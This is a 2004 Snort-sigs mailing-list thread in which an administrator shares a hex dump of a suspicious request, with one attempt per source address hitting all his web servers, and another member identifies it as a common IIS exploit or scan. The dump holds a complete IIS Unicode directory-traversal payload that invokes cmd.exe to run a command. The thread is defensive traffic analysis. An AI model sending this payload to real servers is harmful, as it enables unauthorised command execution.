[Snort-sigs] Weird new CMD.EXE payload...

K. Jared Kalisz jkalisz at ...2550...
Wed Jun 16 08:11:10 EDT 2004


I thought as much. I just have not seen this particular payload before... I
thought maybe others would be experiencing this. What's weird is that it is
coming from different IP addresses, so far, never the same address twice.
The attempts are rolling in one about every 2-5 minutes. Never seen a
pattern like this...  Also, it is targeting ALL of my web servers,
regardless of type (i.e. IIS, Apache, etc..)

So I agree that it is just an IIS exploit, the likes of which I see hundreds
a day. It's more the pattern (frequency of attacks/always a unique source
IP) and the payload that is odd/different, hence the concern.

Thanks,
Jared


 -----Original Message-----
From: 	snort-sigs-admin at lists.sourceforge.net
[mailto:snort-sigs-admin at lists.sourceforge.net]  On Behalf Of Roach4
Sent:	Wednesday, June 16, 2004 9:54 AM
To:	K. Jared Kalisz
Cc:	snort-sigs at lists.sourceforge.net
Subject:	Re: [Snort-sigs] Weird new CMD.EXE payload...

Hi Jared,

This simply looks like an IIS exploit... either it's a scan or a specific
vulnerable string against your web server.

Good luck,

David



>
> I'm seeing a lot of this this morning. Weird patterns too.. One attempt
> from
> each source address They keep pouring in ...
>
> Any thoughts??
>
> 000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get /scripts/..%
> 010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
> 050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
> 060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A      .exe?/c%20dir..
>
>
> Jared Kalisz
> Prodika
> 1245 South Main Street, 2nd Floor
> Grapevine, Texas
> Tel 817.488.3080
> Fax 817.488.7060
>
>
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference
> Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer
> Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA
> REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
>



-------------------------------------------------------
This SF.Net email is sponsored by The 2004 JavaOne(SM) Conference
Learn from the experts at JavaOne(SM), Sun's Worldwide Java Developer
Conference, June 28 - July 1 at the Moscone Center in San Francisco, CA
REGISTER AND SAVE! http://java.sun.com/javaone/sf Priority Code NWMGYKND
_______________________________________________
Snort-sigs mailing list
Snort-sigs at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs





More information about the Snort-sigs mailing list